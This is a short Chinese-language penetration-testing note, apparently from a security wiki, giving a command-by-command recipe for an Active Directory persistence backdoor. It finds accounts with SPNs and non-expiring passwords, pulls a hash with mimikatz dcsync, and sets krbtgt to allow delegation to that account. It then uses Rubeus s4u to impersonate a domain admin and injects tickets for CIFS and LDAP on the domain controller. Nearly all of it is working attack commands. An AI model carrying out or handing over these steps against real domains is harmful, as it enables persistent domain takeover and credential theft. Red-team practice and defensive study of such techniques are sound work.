S4U2Self后门
域控执行,寻找具备SPN且密码永不过期的账户
>Get-ADUser -Filter * -Properties ServicePrincipalName,PasswordNeverExpires| ? {($_.ServicePrincipalName -ne "") -and ($_.PasswordNeverExpires -eq $true)}
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F553.png&width=768&dpr=4&quality=100&sign=63a96ed6&sv=1)
使用mimikatz的dcsync提取用户hash
>lsadump::dcsync /domain:zone.com /user:y
布置后门
>Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount 账户
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F555.png&width=768&dpr=4&quality=100&sign=341c373c&sv=1)
布置完成后利用,登录账户y
触发后门
>Rubeus.exe s4u /user:y /aes256:{aes256} /domain:zone.com /msdsspn:krbtgt /impersonateuser:godadmin
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F556.png&width=768&dpr=4&quality=100&sign=ee450943&sv=1)
注入票据,获取域控的CIFS、LDAP服务
>Rubeus.exe asktgs /ticket:{} /service:cifs/dc.zone.com,ldap/dc.zone.com /ptt
最后更新于